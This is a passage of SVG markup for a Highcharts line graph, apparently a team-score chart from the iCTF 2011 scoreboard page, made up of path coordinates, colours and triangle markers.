250.672 L 8.828 250.672 8.828 256.328 3.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 1.1720000000000002 250.672 L 6.827999999999999 250.672 6.827999999999999 256.328 1.1720000000000002 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path></g><g class="highcharts-series" clip-path="url(http://scoreboard.ictf2011.info/score-graph.html#highcharts-185)" visibility="visible" transform="translate(75,55)"><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.70639689142857 L 67.13220439691028 253.70639689142857 L 69.1078431372549 253.70639689142857 L 71.08348187759952 253.70639689142857 L 73.05912061794415 253.70639689142857 L 75.03475935828877 253.70639689142857 L 77.0103980986334 253.70639689142857 L 78.98603683897802 253.70639689142857 L 80.96167557932264 253.70639689142857 L 82.93731431966727 253.70639689142857 L 84.91295306001189 253.70639689142857 L 86.88859180035651 253.70639689142857 L 88.86423054070113 253.70639689142857 L 90.83986928104575 253.70639689142857 L 92.81550802139039 253.70639689142857 L 94.791146761735 253.70639689142857 L 96.76678550207963 253.70639689142857 L 98.74242424242425 253.70639689142857 L 100.71806298276887 253.70639689142857 L 102.69370172311349 253.70639689142857 L 104.66934046345811 253.70639689142857 L 106.64497920380273 253.70639689142857 L 108.62061794414737 253.70639689142857 L 110.59625668449199 253.5550309485714 L 112.57189542483661 253.5550309485714 L 114.54753416518123 253.47725737142858 L 116.52317290552585 253.44091759238088 L 118.49881164587048 253.44091759238088 L 120.4744503862151 253.38685953523805 L 122.45008912655972 253.38685953523805 L 124.42572786690435 253.38685953523805 L 126.40136660724897 253.38685953523805 L 128.3770053475936 253.38685953523805 L 130.35264408793822 253.38685953523805 L 132.32828282828285 253.38685953523805 L 134.3039215686275 253.38685953523805 L 136.2795603089721 253.38685953523805 L 138.25519904931673 253.38685953523805 L 140.23083778966134 253.38685953523805 L 142.20647653000597 253.38685953523805 L 144.18211527035058 253.2981610209523 L 146.15775401069521 253.2981610209523 L 148.13339275103985 253.15956310857143 L 150.10903149138446 253.15956310857143 L 152.0846702317291 253.15956310857143 L 154.0603089720737 252.9980384457143 L 156.03594771241833 252.7773171657143 L 158.01158645276294 252.61537302857124 L 159.98722519310758 252.36107012571395 L 161.96286393345218 252.01977366857108 L 163.93850267379682 251.84113174857126 L 165.91414141414145 251.56153860571413 L 167.88978015448606 251.0359440914284 L 169.8654188948307 250.89401350095216 L 171.8410576351753 250.5291328914284 L 173.81669637551994 250.20632092952377 L 175.79233511586455 249.97510489904766 L 177.76797385620918 249.72908153904768 L 179.74361259655382 249.53915102476196 L 181.71925133689842 248.7497274819048 L 183.69489007724306 248.5115658819048 L 185.67052881758767 248.19870572190482 L 187.6461675579323 247.64572359619052 L 189.6218062982769 247.5101048533334 L 191.59744503862154 247.0172648533334 L 193.57308377896615 246.5149951390475 L 195.5487225193108 246.33216298666662 L 197.52436125965542 245.37607283809518 L 199.50000000000003 244.9374008380952 L 201.47563874034466 244.33635169523802 L 203.45127748068927 243.59505436952375 L 205.4269162210339 242.98826000761926 L 207.4025549613785 242.72658304000032 L 209.37819370172315 242.40117924571462 L 211.35383244206778 242.07048804571463 L 213.3294711824124 241.90993764571462 L 215.30510992275703 241.25916050285747 L 217.28074866310163 240.8874183314289 L 219.25638740344627 239.81628736000033 L 221.23202614379088 238.8560295314289 L 223.2076648841355 237.77911387428605 L 225.18330362448012 237.2949255314289 L 227.15894236482475 236.10424438857177 L 229.1345811051694 234.80847478857174 L 231.110219845514 234.28145947428607 L 233.08585858585863 233.19490267428606 L 235.06149732620324 232.82316050285746 L 237.03713606654787 232.32578409142891 L 239.01277480689248 232.32578409142891 L 240.98841354723712 231.48969459809535 L 242.96405228758175 230.84367036952392 L 244.93969102792636 230.36298553904766 L 246.915329768271 230.31479673904767 L 248.8909685086156 230.26191140571444 L 250.86660724896024 229.85109723428587 L 252.84224598930484 229.45724527238087 L 254.81788472964945 229.14227364571394 L 256.79352346999406 228.56958975999964 L 258.7691622103387 228.44012217904717 L 260.7448009506833 228.218791420952 L 262.72043969102793 227.94151046095197 L 264.69607843137254 227.85038643809486 L 266.6717171717172 227.748743420952 L 268.6473559120618 227.748743420952 L 270.6229946524064 227.748743420952 L 272.598633392751 227.748743420952 L 274.5742721330957 227.748743420952 L 276.5499108734403 227.748743420952 L 278.5255496137849 227.748743420952 L 280.50118835412957 227.748743420952 L 282.4768270944742 227.748743420952 L 284.4524658348188 227.748743420952 L 286.4281045751634 227.748743420952 L 288.40374331550805 227.748743420952 L 290.37938205585266 227.748743420952 L 292.35502079619727 227.748743420952 L 294.33065953654193 227.748743420952 L 296.30629827688654 227.748743420952 L 298.28193701723114 227.748743420952 L 300.25757575757575 227.40262639238057 L 302.2332144979204 227.40262639238057 L 304.208853238265 227.40262639238057 L 306.1844919786096 227.40262639238057 L 308.1601307189543 227.40262639238057 L 310.1357694592989 227.40262639238057 L 312.1114081996435 227.40262639238057 L 314.0870469399881 227.26269112380913 L 316.0626856803328 227.26269112380913 L 318.0383244206774 227.26269112380913 L 320.013963161022 227.2270921904759 L 321.98960190136665 226.9217273142857 L 323.96524064171126 226.61864022857142 L 325.94087938205587 226.51412460190477 L 327.9165181224005 224.04406380190477 L 329.89215686274514 221.5894288304762 L 331.86779560308975 218.1759568304762 L 333.84343434343435 216.93600437333333 L 335.81907308377896 215.35831760761906 L 337.7947118241236 214.51450899809495 L 339.77035056446823 213.30465607619098 L 341.74598930481284 212.37551827809546 L 343.7216280451575 210.82673351619013 L 345.6972667855021 210.82673351619013 L 347.6729055258467 210.82673351619013 L 349.6485442661913 210.82673351619013 L 351.624183006536 210.82673351619013 L 353.5998217468806 210.82673351619013 L 355.5754604872252 210.82673351619013 L 357.55109922756986 210.82673351619013 L 359.52673796791447 210.82673351619013 L 361.5023767082591 210.82673351619013 L 363.4780154486037 210.82673351619013 L 365.45365418894835 210.82673351619013 L 367.42929292929296 210.82673351619013 L 369.40493166963756 210.82673351619013 L 371.3805704099822 210.82673351619013 L 373.35620915032683 210.82673351619013 L 375.33184789067144 210.82673351619013 L 377.30748663101605 208.58919678476155 L 379.2831253713607 206.56262855619013 L 381.2587641117053 206.56262855619013 L 383.2344028520499 206.56262855619013 L 385.2100415923946 206.56262855619013 L 387.1856803327392 206.56262855619013 L 389.1613190730838 206.56262855619013 L 391.1369578134284 206.56262855619013 L 393.1125965537731 205.97162424380872 L 395.0882352941177 204.12246431999927" fill="none" stroke="rgb(0, 0, 0)" stroke-width="5" isShadow="true" stroke-opacity="0.05" transform="translate(1,1)"></path><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.70639689142857 L 67.13220439691028 253.70639689142857 L 69.1078431372549 253.70639689142857 L 71.08348187759952 253.70639689142857 L 73.05912061794415 253.70639689142857 L 75.03475935828877 253.70639689142857 L 77.0103980986334 253.70639689142857 L 78.98603683897802 253.70639689142857 L 80.96167557932264 253.70639689142857 L 82.93731431966727 253.70639689142857 L 84.91295306001189 253.70639689142857 L 86.88859180035651 253.70639689142857 L 88.86423054070113 253.70639689142857 L 90.83986928104575 253.70639689142857 L 92.81550802139039 253.70639689142857 L 94.791146761735 253.70639689142857 L 96.76678550207963 253.70639689142857 L 98.74242424242425 253.70639689142857 L 100.71806298276887 253.70639689142857 L 102.69370172311349 253.70639689142857 L 104.66934046345811 253.70639689142857 L 106.64497920380273 253.70639689142857 L 108.62061794414737 253.70639689142857 L 110.59625668449199 253.5550309485714 L 112.57189542483661 253.5550309485714 L 114.54753416518123 253.47725737142858 L 116.52317290552585 253.44091759238088 L 118.49881164587048 253.44091759238088 L 120.4744503862151 253.38685953523805 L 122.45008912655972 253.38685953523805 L 124.42572786690435 253.38685953523805 L 126.40136660724897 253.38685953523805 L 128.3770053475936 253.38685953523805 L 130.35264408793822 253.38685953523805 L 132.32828282828285 253.38685953523805 L 134.3039215686275 253.38685953523805 L 136.2795603089721 253.38685953523805 L 138.25519904931673 253.38685953523805 L 140.23083778966134 253.38685953523805 L 142.20647653000597 253.38685953523805 L 144.18211527035058 253.2981610209523 L 146.15775401069521 253.2981610209523 L 148.13339275103985 253.15956310857143 L 150.10903149138446 253.15956310857143 L 152.0846702317291 253.15956310857143 L 154.0603089720737 252.9980384457143 L 156.03594771241833 252.7773171657143 L 158.01158645276294 252.61537302857124 L 159.98722519310758 252.36107012571395 L 161.96286393345218 252.01977366857108 L 163.93850267379682 251.84113174857126 L 165.91414141414145 251.56153860571413 L 167.88978015448606 251.0359440914284 L 169.8654188948307 250.89401350095216 L 171.8410576351753 250.5291328914284 L 173.81669637551994 250.20632092952377 L 175.79233511586455 249.97510489904766 L 177.76797385620918 249.72908153904768 L 179.74361259655382 249.53915102476196 L 181.71925133689842 248.7497274819048 L 183.69489007724306 248.5115658819048 L 185.67052881758767 248.19870572190482 L 187.6461675579323 247.64572359619052 L 189.6218062982769 247.5101048533334 L 191.59744503862154 247.0172648533334 L 193.57308377896615 246.5149951390475 L 195.5487225193108 246.33216298666662 L 197.52436125965542 245.37607283809518 L 199.50000000000003 244.9374008380952 L 201.47563874034466 244.33635169523802 L 203.45127748068927 243.59505436952375 L 205.4269162210339 242.98826000761926 L 207.4025549613785 242.72658304000032 L 209.37819370172315 242.40117924571462 L 211.35383244206778 242.07048804571463 L 213.3294711824124 241.90993764571462 L 215.30510992275703 241.25916050285747 L 217.28074866310163 240.8874183314289 L 219.25638740344627 239.81628736000033 L 221.23202614379088 238.8560295314289 L 223.2076648841355 237.77911387428605 L 225.18330362448012 237.2949255314289 L 227.15894236482475 236.10424438857177 L 229.1345811051694 234.80847478857174 L 231.110219845514 234.28145947428607 L 233.08585858585863 233.19490267428606 L 235.06149732620324 232.82316050285746 L 237.03713606654787 232.32578409142891 L 239.01277480689248 232.32578409142891 L 240.98841354723712 231.48969459809535 L 242.96405228758175 230.84367036952392 L 244.93969102792636 230.36298553904766 L 246.915329768271 230.31479673904767 L 248.8909685086156 230.26191140571444 L 250.86660724896024 229.85109723428587 L 252.84224598930484 229.45724527238087 L 254.81788472964945 229.14227364571394 L 256.79352346999406 228.56958975999964 L 258.7691622103387 228.44012217904717 L 260.7448009506833 228.218791420952 L 262.72043969102793 227.94151046095197 L 264.69607843137254 227.85038643809486 L 266.6717171717172 227.748743420952 L 268.6473559120618 227.748743420952 L 270.6229946524064 227.748743420952 L 272.598633392751 227.748743420952 L 274.5742721330957 227.748743420952 L 276.5499108734403 227.748743420952 L 278.5255496137849 227.748743420952 L 280.50118835412957 227.748743420952 L 282.4768270944742 227.748743420952 L 284.4524658348188 227.748743420952 L 286.4281045751634 227.748743420952 L 288.40374331550805 227.748743420952 L 290.37938205585266 227.748743420952 L 292.35502079619727 227.748743420952 L 294.33065953654193 227.748743420952 L 296.30629827688654 227.748743420952 L 298.28193701723114 227.748743420952 L 300.25757575757575 227.40262639238057 L 302.2332144979204 227.40262639238057 L 304.208853238265 227.40262639238057 L 306.1844919786096 227.40262639238057 L 308.1601307189543 227.40262639238057 L 310.1357694592989 227.40262639238057 L 312.1114081996435 227.40262639238057 L 314.0870469399881 227.26269112380913 L 316.0626856803328 227.26269112380913 L 318.0383244206774 227.26269112380913 L 320.013963161022 227.2270921904759 L 321.98960190136665 226.9217273142857 L 323.96524064171126 226.61864022857142 L 325.94087938205587 226.51412460190477 L 327.9165181224005 224.04406380190477 L 329.89215686274514 221.5894288304762 L 331.86779560308975 218.1759568304762 L 333.84343434343435 216.93600437333333 L 335.81907308377896 215.35831760761906 L 337.7947118241236 214.51450899809495 L 339.77035056446823 213.30465607619098 L 341.74598930481284 212.37551827809546 L 343.7216280451575 210.82673351619013 L 345.6972667855021 210.82673351619013 L 347.6729055258467 210.82673351619013 L 349.6485442661913 210.82673351619013 L 351.624183006536 210.82673351619013 L 353.5998217468806 210.82673351619013 L 355.5754604872252 210.82673351619013 L 357.55109922756986 210.82673351619013 L 359.52673796791447 210.82673351619013 L 361.5023767082591 210.82673351619013 L 363.4780154486037 210.82673351619013 L 365.45365418894835 210.82673351619013 L 367.42929292929296 210.82673351619013 L 369.40493166963756 210.82673351619013 L 371.3805704099822 210.82673351619013 L 373.35620915032683 210.82673351619013 L 375.33184789067144 210.82673351619013 L 377.30748663101605 208.58919678476155 L 379.2831253713607 206.56262855619013 L 381.2587641117053 206.56262855619013 L 383.2344028520499 206.56262855619013 L 385.2100415923946 206.56262855619013 L 387.1856803327392 206.56262855619013 L 389.1613190730838 206.56262855619013 L 391.1369578134284 206.56262855619013 L 393.1125965537731 205.97162424380872 L 395.0882352941177 204.12246431999927" fill="none" stroke="rgb(0, 0, 0)" stroke-width="3" isShadow="true" stroke-opacity="0.1" transform="translate(1,1)"></path><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.70639689142857 L 67.13220439691028 253.70639689142857 L 69.1078431372549 253.70639689142857 L 71.08348187759952 253.70639689142857 L 73.05912061794415 253.70639689142857 L 75.03475935828877 253.70639689142857 L 77.0103980986334 253.70639689142857 L 78.98603683897802 253.70639689142857 L 80.96167557932264 253.70639689142857 L 82.93731431966727 253.70639689142857 L 84.91295306001189 253.70639689142857 L 86.88859180035651 253.70639689142857 L 88.86423054070113 253.70639689142857 L 90.83986928104575 253.70639689142857 L 92.81550802139039 253.70639689142857 L 94.791146761735 253.70639689142857 L 96.76678550207963 253.70639689142857 L 98.74242424242425 253.70639689142857 L 100.71806298276887 253.70639689142857 L 102.69370172311349 253.70639689142857 L 104.66934046345811 253.70639689142857 L 106.64497920380273 253.70639689142857 L 108.62061794414737 253.70639689142857 L 110.59625668449199 253.5550309485714 L 112.57189542483661 253.5550309485714 L 114.54753416518123 253.47725737142858 L 116.52317290552585 253.44091759238088 L 118.49881164587048 253.44091759238088 L 120.4744503862151 253.38685953523805 L 122.45008912655972 253.38685953523805 L 124.42572786690435 253.38685953523805 L 126.40136660724897 253.38685953523805 L 128.3770053475936 253.38685953523805 L 130.35264408793822 253.38685953523805 L 132.32828282828285 253.38685953523805 L 134.3039215686275 253.38685953523805 L 136.2795603089721 253.38685953523805 L 138.25519904931673 253.38685953523805 L 140.23083778966134 253.38685953523805 L 142.20647653000597 253.38685953523805 L 144.18211527035058 253.2981610209523 L 146.15775401069521 253.2981610209523 L 148.13339275103985 253.15956310857143 L 150.10903149138446 253.15956310857143 L 152.0846702317291 253.15956310857143 L 154.0603089720737 252.9980384457143 L 156.03594771241833 252.7773171657143 L 158.01158645276294 252.61537302857124 L 159.98722519310758 252.36107012571395 L 161.96286393345218 252.01977366857108 L 163.93850267379682 251.84113174857126 L 165.91414141414145 251.56153860571413 L 167.88978015448606 251.0359440914284 L 169.8654188948307 250.89401350095216 L 171.8410576351753 250.5291328914284 L 173.81669637551994 250.20632092952377 L 175.79233511586455 249.97510489904766 L 177.76797385620918 249.72908153904768 L 179.74361259655382 249.53915102476196 L 181.71925133689842 248.7497274819048 L 183.69489007724306 248.5115658819048 L 185.67052881758767 248.19870572190482 L 187.6461675579323 247.64572359619052 L 189.6218062982769 247.5101048533334 L 191.59744503862154 247.0172648533334 L 193.57308377896615 246.5149951390475 L 195.5487225193108 246.33216298666662 L 197.52436125965542 245.37607283809518 L 199.50000000000003 244.9374008380952 L 201.47563874034466 244.33635169523802 L 203.45127748068927 243.59505436952375 L 205.4269162210339 242.98826000761926 L 207.4025549613785 242.72658304000032 L 209.37819370172315 242.40117924571462 L 211.35383244206778 242.07048804571463 L 213.3294711824124 241.90993764571462 L 215.30510992275703 241.25916050285747 L 217.28074866310163 240.8874183314289 L 219.25638740344627 239.81628736000033 L 221.23202614379088 238.8560295314289 L 223.2076648841355 237.77911387428605 L 225.18330362448012 237.2949255314289 L 227.15894236482475 236.10424438857177 L 229.1345811051694 234.80847478857174 L 231.110219845514 234.28145947428607 L 233.08585858585863 233.19490267428606 L 235.06149732620324 232.82316050285746 L 237.03713606654787 232.32578409142891 L 239.01277480689248 232.32578409142891 L 240.98841354723712 231.48969459809535 L 242.96405228758175 230.84367036952392 L 244.93969102792636 230.36298553904766 L 246.915329768271 230.31479673904767 L 248.8909685086156 230.26191140571444 L 250.86660724896024 229.85109723428587 L 252.84224598930484 229.45724527238087 L 254.81788472964945 229.14227364571394 L 256.79352346999406 228.56958975999964 L 258.7691622103387 228.44012217904717 L 260.7448009506833 228.218791420952 L 262.72043969102793 227.94151046095197 L 264.69607843137254 227.85038643809486 L 266.6717171717172 227.748743420952 L 268.6473559120618 227.748743420952 L 270.6229946524064 227.748743420952 L 272.598633392751 227.748743420952 L 274.5742721330957 227.748743420952 L 276.5499108734403 227.748743420952 L 278.5255496137849 227.748743420952 L 280.50118835412957 227.748743420952 L 282.4768270944742 227.748743420952 L 284.4524658348188 227.748743420952 L 286.4281045751634 227.748743420952 L 288.40374331550805 227.748743420952 L 290.37938205585266 227.748743420952 L 292.35502079619727 227.748743420952 L 294.33065953654193 227.748743420952 L 296.30629827688654 227.748743420952 L 298.28193701723114 227.748743420952 L 300.25757575757575 227.40262639238057 L 302.2332144979204 227.40262639238057 L 304.208853238265 227.40262639238057 L 306.1844919786096 227.40262639238057 L 308.1601307189543 227.40262639238057 L 310.1357694592989 227.40262639238057 L 312.1114081996435 227.40262639238057 L 314.0870469399881 227.26269112380913 L 316.0626856803328 227.26269112380913 L 318.0383244206774 227.26269112380913 L 320.013963161022 227.2270921904759 L 321.98960190136665 226.9217273142857 L 323.96524064171126 226.61864022857142 L 325.94087938205587 226.51412460190477 L 327.9165181224005 224.04406380190477 L 329.89215686274514 221.5894288304762 L 331.86779560308975 218.1759568304762 L 333.84343434343435 216.93600437333333 L 335.81907308377896 215.35831760761906 L 337.7947118241236 214.51450899809495 L 339.77035056446823 213.30465607619098 L 341.74598930481284 212.37551827809546 L 343.7216280451575 210.82673351619013 L 345.6972667855021 210.82673351619013 L 347.6729055258467 210.82673351619013 L 349.6485442661913 210.82673351619013 L 351.624183006536 210.82673351619013 L 353.5998217468806 210.82673351619013 L 355.5754604872252 210.82673351619013 L 357.55109922756986 210.82673351619013 L 359.52673796791447 210.82673351619013 L 361.5023767082591 210.82673351619013 L 363.4780154486037 210.82673351619013 L 365.45365418894835 210.82673351619013 L 367.42929292929296 210.82673351619013 L 369.40493166963756 210.82673351619013 L 371.3805704099822 210.82673351619013 L 373.35620915032683 210.82673351619013 L 375.33184789067144 210.82673351619013 L 377.30748663101605 208.58919678476155 L 379.2831253713607 206.56262855619013 L 381.2587641117053 206.56262855619013 L 383.2344028520499 206.56262855619013 L 385.2100415923946 206.56262855619013 L 387.1856803327392 206.56262855619013 L 389.1613190730838 206.56262855619013 L 391.1369578134284 206.56262855619013 L 393.1125965537731 205.97162424380872 L 395.0882352941177 204.12246431999927" fill="none" stroke="rgb(0, 0, 0)" stroke-width="1" isShadow="true" stroke-opacity="0.15000000000000002" transform="translate(1,1)"></path><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.70639689142857 L 67.13220439691028 253.70639689142857 L 69.1078431372549 253.70639689142857 L 71.08348187759952 253.70639689142857 L 73.05912061794415 253.70639689142857 L 75.03475935828877 253.70639689142857 L 77.0103980986334 253.70639689142857 L 78.98603683897802 253.70639689142857 L 80.96167557932264 253.70639689142857 L 82.93731431966727 253.70639689142857 L 84.91295306001189 253.70639689142857 L 86.88859180035651 253.70639689142857 L 88.86423054070113 253.70639689142857 L 90.83986928104575 253.70639689142857 L 92.81550802139039 253.70639689142857 L 94.791146761735 253.70639689142857 L 96.76678550207963 253.70639689142857 L 98.74242424242425 253.70639689142857 L 100.71806298276887 253.70639689142857 L 102.69370172311349 253.70639689142857 L 104.66934046345811 253.70639689142857 L 106.64497920380273 253.70639689142857 L 108.62061794414737 253.70639689142857 L 110.59625668449199 253.5550309485714 L 112.57189542483661 253.5550309485714 L 114.54753416518123 253.47725737142858 L 116.52317290552585 253.44091759238088 L 118.49881164587048 253.44091759238088 L 120.4744503862151 253.38685953523805 L 122.45008912655972 253.38685953523805 L 124.42572786690435 253.38685953523805 L 126.40136660724897 253.38685953523805 L 128.3770053475936 253.38685953523805 L 130.35264408793822 253.38685953523805 L 132.32828282828285 253.38685953523805 L 134.3039215686275 253.38685953523805 L 136.2795603089721 253.38685953523805 L 138.25519904931673 253.38685953523805 L 140.23083778966134 253.38685953523805 L 142.20647653000597 253.38685953523805 L 144.18211527035058 253.2981610209523 L 146.15775401069521 253.2981610209523 L 148.13339275103985 253.15956310857143 L 150.10903149138446 253.15956310857143 L 152.0846702317291 253.15956310857143 L 154.0603089720737 252.9980384457143 L 156.03594771241833 252.7773171657143 L 158.01158645276294 252.61537302857124 L 159.98722519310758 252.36107012571395 L 161.96286393345218 252.01977366857108 L 163.93850267379682 251.84113174857126 L 165.91414141414145 251.56153860571413 L 167.88978015448606 251.0359440914284 L 169.8654188948307 250.89401350095216 L 171.8410576351753 250.5291328914284 L 173.81669637551994 250.20632092952377 L 175.79233511586455 249.97510489904766 L 177.76797385620918 249.72908153904768 L 179.74361259655382 249.53915102476196 L 181.71925133689842 248.7497274819048 L 183.69489007724306 248.5115658819048 L 185.67052881758767 248.19870572190482 L 187.6461675579323 247.64572359619052 L 189.6218062982769 247.5101048533334 L 191.59744503862154 247.0172648533334 L 193.57308377896615 246.5149951390475 L 195.5487225193108 246.33216298666662 L 197.52436125965542 245.37607283809518 L 199.50000000000003 244.9374008380952 L 201.47563874034466 244.33635169523802 L 203.45127748068927 243.59505436952375 L 205.4269162210339 242.98826000761926 L 207.4025549613785 242.72658304000032 L 209.37819370172315 242.40117924571462 L 211.35383244206778 242.07048804571463 L 213.3294711824124 241.90993764571462 L 215.30510992275703 241.25916050285747 L 217.28074866310163 240.8874183314289 L 219.25638740344627 239.81628736000033 L 221.23202614379088 238.8560295314289 L 223.2076648841355 237.77911387428605 L 225.18330362448012 237.2949255314289 L 227.15894236482475 236.10424438857177 L 229.1345811051694 234.80847478857174 L 231.110219845514 234.28145947428607 L 233.08585858585863 233.19490267428606 L 235.06149732620324 232.82316050285746 L 237.03713606654787 232.32578409142891 L 239.01277480689248 232.32578409142891 L 240.98841354723712 231.48969459809535 L 242.96405228758175 230.84367036952392 L 244.93969102792636 230.36298553904766 L 246.915329768271 230.31479673904767 L 248.8909685086156 230.26191140571444 L 250.86660724896024 229.85109723428587 L 252.84224598930484 229.45724527238087 L 254.81788472964945 229.14227364571394 L 256.79352346999406 228.56958975999964 L 258.7691622103387 228.44012217904717 L 260.7448009506833 228.218791420952 L 262.72043969102793 227.94151046095197 L 264.69607843137254 227.85038643809486 L 266.6717171717172 227.748743420952 L 268.6473559120618 227.748743420952 L 270.6229946524064 227.748743420952 L 272.598633392751 227.748743420952 L 274.5742721330957 227.748743420952 L 276.5499108734403 227.748743420952 L 278.5255496137849 227.748743420952 L 280.50118835412957 227.748743420952 L 282.4768270944742 227.748743420952 L 284.4524658348188 227.748743420952 L 286.4281045751634 227.748743420952 L 288.40374331550805 227.748743420952 L 290.37938205585266 227.748743420952 L 292.35502079619727 227.748743420952 L 294.33065953654193 227.748743420952 L 296.30629827688654 227.748743420952 L 298.28193701723114 227.748743420952 L 300.25757575757575 227.40262639238057 L 302.2332144979204 227.40262639238057 L 304.208853238265 227.40262639238057 L 306.1844919786096 227.40262639238057 L 308.1601307189543 227.40262639238057 L 310.1357694592989 227.40262639238057 L 312.1114081996435 227.40262639238057 L 314.0870469399881 227.26269112380913 L 316.0626856803328 227.26269112380913 L 318.0383244206774 227.26269112380913 L 320.013963161022 227.2270921904759 L 321.98960190136665 226.9217273142857 L 323.96524064171126 226.61864022857142 L 325.94087938205587 226.51412460190477 L 327.9165181224005 224.04406380190477 L 329.89215686274514 221.5894288304762 L 331.86779560308975 218.1759568304762 L 333.84343434343435 216.93600437333333 L 335.81907308377896 215.35831760761906 L 337.7947118241236 214.51450899809495 L 339.77035056446823 213.30465607619098 L 341.74598930481284 212.37551827809546 L 343.7216280451575 210.82673351619013 L 345.6972667855021 210.82673351619013 L 347.6729055258467 210.82673351619013 L 349.6485442661913 210.82673351619013 L 351.624183006536 210.82673351619013 L 353.5998217468806 210.82673351619013 L 355.5754604872252 210.82673351619013 L 357.55109922756986 210.82673351619013 L 359.52673796791447 210.82673351619013 L 361.5023767082591 210.82673351619013 L 363.4780154486037 210.82673351619013 L 365.45365418894835 210.82673351619013 L 367.42929292929296 210.82673351619013 L 369.40493166963756 210.82673351619013 L 371.3805704099822 210.82673351619013 L 373.35620915032683 210.82673351619013 L 375.33184789067144 210.82673351619013 L 377.30748663101605 208.58919678476155 L 379.2831253713607 206.56262855619013 L 381.2587641117053 206.56262855619013 L 383.2344028520499 206.56262855619013 L 385.2100415923946 206.56262855619013 L 387.1856803327392 206.56262855619013 L 389.1613190730838 206.56262855619013 L 391.1369578134284 206.56262855619013 L 393.1125965537731 205.97162424380872 L 395.0882352941177 204.12246431999927" fill="none" stroke="#DF5353" stroke-width="2"></path><path d="M 395 198.68 L 399 206.68 391 206.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 393 200.68 L 397 208.68 389 208.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 391 201.18 L 395 209.18 387 209.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 389 201.18 L 393 209.18 385 209.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 387 201.18 L 391 209.18 383 209.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 385 201.18 L 389 209.18 381 